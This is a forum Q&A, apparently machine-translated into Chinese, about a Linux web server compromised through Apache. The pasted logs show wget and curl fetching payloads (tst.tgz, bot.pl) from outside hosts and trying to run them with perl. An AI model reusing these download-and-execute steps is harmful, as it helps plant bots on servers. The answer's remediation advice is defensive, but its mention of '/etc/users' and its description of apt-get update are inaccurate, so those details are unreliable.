在我超出頻寬後,我的網站託管服務商禁用了我的帳戶。這很奇怪,因為該網站很小。我開始研究日誌,雖然我習慣看到嘗試尋找我沒有的共同端點,但我看到了一些非常令人不安的事情。第一的:
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 77597 100 77597 0 0 184k 0 --:--:-- --:--:-- --:--:-- 246k
--2019-10-13 11:49:21-- ftp://matei:*password*@tyger.ignorelist.com/tst.tgz
=> `tst.tgz'
Resolving tyger.ignorelist.com... 86.121.73.246
Connecting to tyger.ignorelist.com|86.121.73.246|:21... connected.
Logging in as matei ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD not needed.
==> SIZE tst.tgz ... 21765
==> PASV ... done. ==> RETR tst.tgz ... done.
0K .......... .......... . 53.3K=0.4s
2019-10-13 11:49:23 (53.3 KB/s) - `tst.tgz' saved [21765]
和
我從來沒有見過這些東西。我想我已經被以某種方式接管了。我如何解決它?
curl: (7) couldn't connect to host
curl: (7) couldn't connect to host
Can't open perl script "bot.pl": No such file or directory
Can't open perl script "bot.pl": No such file or directory
sh: GET: command not found
sh: GET: command not found
--2019-10-15 22:14:04-- ftp://94.177.240.65/bot.pl
=> `bot.pl'
Connecting to 94.177.240.65:21... --2019-10-15 22:14:04--
ftp://94.177.240.65/bot.pl
=> `bot.pl'
Connecting to 94.177.240.65:21... failed: Connection refused.
failed: Connection refused.
答案1
您的 Linux 電腦似乎已透過 Apache 服務受到損害。
我如何解決它?
沒有簡單的修復方法,因為您需要調查整個系統是否有潛在的漏洞。
以下是一些一般性建議:
- 將 Apache 升級到最新版本(通過
apt-get)。 - 升級您的所有軟體包 (
sudo apt-get update)。 - 升級所有正在使用的 Web CMS/框架(檢查是否有任何已知漏洞)。
- 掃描整個系統是否有任何現有漏洞(例如惡意軟體掃描程式、防毒程式)。
- 掃描您的所有網站是否有任何惡意軟體和 shellcode 檔案。
如果您使用 PHP:
- 用一個PHP 安全掃描器。
- 用一個適用於基於 PHP 的網站的惡意軟體掃描程序。
- 如果您使用共享託管,請聯絡託管公司。
- 檢查您的系統是否有任何額外的意外使用者 (
/etc/users) 或檔案(例如/tmp)。 如果您已確認違規:
- 更改所有公開的憑證(存取金鑰、密碼等)。
- 保存所有證據以備不時之需(IP 位址、日誌、受感染/惡意軟體檔案)。
- 修補系統後,繼續監視日誌以發現任何進一步的可疑活動。
如果您對上述內容沒有信心,請聯絡專門從事這方面工作的 IT 公司。
也可以看看: